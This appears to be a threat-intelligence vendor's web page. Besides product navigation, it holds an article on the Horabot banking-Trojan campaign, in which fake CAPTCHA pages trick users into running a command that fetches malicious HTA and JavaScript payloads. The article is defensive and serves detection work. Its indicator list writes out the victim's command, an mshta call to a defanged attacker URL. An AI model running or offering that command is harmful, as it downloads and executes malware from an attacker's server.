Firewall integrations

Fortinet

Elevate the power of your Fortinet Fortigate Firewall using by adding our Intelligence.

Palo Alto

Palo Alto Firewalls can be hardened with our threat intelligence as well.

Sophos XGS

Enhance the Sophos XGS Firewall with our threat intelligence.

OPNsense

Enhance your OPNsense Firewall with our threat intelligence using the native plugin.

SIEM integrations

Splunk

Splunk is a great platform, but without the right Threat Intelligence it's just a log server. Try our threat intelligence today. 

Microsoft Sentinel

One of the most used SIEM solutions should be enriched with the right Intelligence. At Q-Feeds you're at the right place!

Other

Luckily there are many other SIEM vendors whom support 3rd party threat intelligence.

Threat Intelligence Portal

Darkweb Monitoring

Darkweb monitoring is one of our services, not only for threat intelligence but also for you most important assets.

Threat Lookup

With Threat Lookup you get full insights in our IOC database, including full MITRE ATT&K mapping.

External Attack Surface Management

A toolset to check your external facing assets exposed on the internet

Vulnerability Scanner

A comprehensive vulnerability scanner which can scan your infrastructure and web applications

Brand Protection

Protect your brand for look-a-likes and potential phishing attempts

Services

TAXII Feeds & Server Software

TAXII/STIX2.1 standard. Both in form of feeds and server software available

Implementation

Need help with implementations? No worries, we have a strong network of partners who are able to help you.

Solutions

Enrich my SIEM

Elevate the power of your SIEM solution using by adding our Intelligence.

Enrich my Firewall

Firewalls can be hardened with our threat intelligence as well.

Prevent phishing

Enhance your protection against phishing

Achieve compliancy

Achieve compliancy by correlating the best threat intelligence to your logs

Futuristic eye design with circuits and geometric shapes.

Company

About

Read here all about Q-Feeds

News and Updates

Cybersecurity news and updates about us

Publications

All of our media coverage in one place

Become a reseller

Strengthen your portfolio with our comprehensive reseller program

Partner locator

Find our certified partners here

Contact

For all your questions or inquiries

Neural network representation of a human brain

Support

My Account

Access your account and manage your licenses

Downloads & Manuals

On this page you find white papers and manuals

Knowledge base

Our knowledge base full of implementation instructions

Start for free

Start your cyber security intelligence journey here

Abstract geometric wireframe human head

Unveiling the Horabot campaign: Strategies to detect this stealthy malware

Mar 19, 2026 | Threat Intelligence Research

Horabot Campaign Targets Users with Sophisticated Phishing Techniques

Threat intelligence from Kaspersky highlights the ongoing threat posed by the Horabot campaign, which leverages a banking Trojan and an intricate attack chain. The campaign remains active, as evidenced by several incidents recently investigated by Kaspersky’s Managed Detection and Response (MDR) team.

The attack typically initiates with users encountering a fraudulent CAPTCHA page, exemplified by a recent alert for a suspicious URL. Victims are misled into executing a command that triggers a malicious HTA file download. This file subsequently executes a payload that connects to the attacker’s server to retrieve additional malicious JavaScript. The execution of this command signifies a critical entry point for the threat actor, showcasing the need for vigilance against social engineering methods.

The attack chain consists of two primary stages. Initially, users are duped into accessing the fake CAPTCHA page, which appears similar to other known phishing attempts. Once engaged, an HTA file is downloaded and run, leading to further downloads of malicious scripts. These dynamics illustrate the use of server-side polymorphism, where the payload is designed to dynamically generate additional scripts, thereby complicating detection efforts.

Defensive Context

This attack primarily targets individuals and organizations susceptible to social engineering tactics. Users who frequently engage with online services or financial platforms should be particularly aware, as the campaign exploits typical browsing behaviors. Organizations with inadequate user awareness programs or insufficient endpoint protections are at greater risk.

Why This Matters
The risk from the Horabot campaign is notable for sectors handling sensitive financial data. Users leveraging online banking services may find themselves in jeopardy if they interact with materials disseminated through these phishing techniques. The nuanced nature of this threat underscores the necessity for targeted user education to mitigate the risks associated with such convincing social engineering narratives.

Defender Considerations
For defenders, understanding the intricacies of the Horabot campaign is crucial. Specifically, monitoring for any signs of mshta activity, which was key in the initial incident alert, may provide early detection opportunities. Moreover, security teams should investigate any alerts or unusual behaviors around URLs tied to this campaign to preemptively stop further incidents.

Indicators of Compromise (IOCs)

  • Malicious URL: https://evs.grupotuis[.]buzz/0capcha17/
  • Command executed by the victim: mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

These indicators provide concrete references for analysts seeking to identify or mitigate risks associated with the Horabot campaign.

Click here for the full article

Try our Intelligence today!

Streamline your security operations with a free Q-Feeds trial and see the difference.

Other articles